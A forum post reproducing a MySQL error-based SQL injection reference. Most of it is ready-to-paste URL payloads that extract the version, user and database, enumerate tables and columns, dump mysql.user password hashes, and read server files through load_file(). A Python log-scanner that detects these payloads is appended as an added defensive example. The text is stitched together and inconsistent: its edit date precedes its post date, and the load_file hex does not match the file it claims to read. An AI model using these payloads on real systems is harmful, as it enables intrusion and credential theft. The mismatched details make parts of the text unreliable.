MySQL error-based injection reference (pdf)
Posted on 2013-7-27 11:00:46
Last edited by Nightmare on 2013-3-17 14:20

MySQL error-based injection reference (pdf), one post a day...

MySQL Error Based Injection Reference
[MySQL error-based injection reference]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
Team: http://www.FreeBuf.com/

Tested on MySQL 5.0.91; works on the great majority of 5.x versions.
A small number of versions throw an error on name_const(); for those, use the Method.2 variant given below.
Query the version:
Method.1: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2: and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b)

Query the current user:
Method.1: and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Query the current database:
Method.1: and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Enumerate databases one by one:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Replace n sequentially.

Number of tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C=mysql

Enumerate tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C=mysql; replace n sequentially.

Number of columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Enumerate columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n sequentially.

Dump row contents one by one:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n sequentially.

Read file contents:
and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini. Only 64 bytes of content can be leaked per error, so use substring() to control which bytes are shown.
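As an added defensive example (not part of the original post), the following Python scans web access-log lines for the signatures of the two techniques listed above, name_const() used twice in a self-join and floor(rand(0)*2) used as a GROUP BY key, plus load_file(); the sample log lines are constructed, and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the two MySQL error-based techniques in the reference above.
# Method 1: name_const() twice in a self-join, so MySQL reports a duplicate column name.
# Method 2: floor(rand(0)*2) as a GROUP BY key, so MySQL reports a duplicate entry.
# load_file() is what the "read file contents" payload depends on.
SIGNATURES = {
    "name_const_join": re.compile(r"name_const\(.+\bjoin\b.+name_const\("),
    "rand_group_by": re.compile(r"floor\(rand\(0\)\*2\).+group by"),
    "load_file": re.compile(r"load_file\("),
}

def normalize(raw):
    """URL-decode twice (catches double encoding), collapse whitespace, fold case."""
    text = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", text).lower()

def classify(raw):
    """Return the names of every signature that matches the request string."""
    text = normalize(raw)
    return [name for name, pat in SIGNATURES.items() if pat.search(text)]

def scan_log(lines):
    """Return (1-based line number, matched signatures) for each suspicious log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        matched = classify(line)
        if matched:
            hits.append((n, matched))
    return hits

# Constructed sample access-log lines (not real traffic); line 2 is a benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Jul/2013:11:00:46 +0800] "GET /item.php?id=1+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) HTTP/1.1" 500 312',
    '10.0.0.6 - - [27/Jul/2013:11:01:02 +0800] "GET /item.php?id=42 HTTP/1.1" 200 1820',
    '10.0.0.7 - - [27/Jul/2013:11:01:30 +0800] "GET /item.php?id=1+and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 312',
    '10.0.0.8 - - [27/Jul/2013:11:02:11 +0800] "GET /item.php?id=1+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for n, matched in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(matched)}")
```

A spike of HTTP 500 responses on the same parameter is the companion signal to look for, since every one of these payloads only works by forcing a database error.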
Thx for reading.

You don't have to download it either,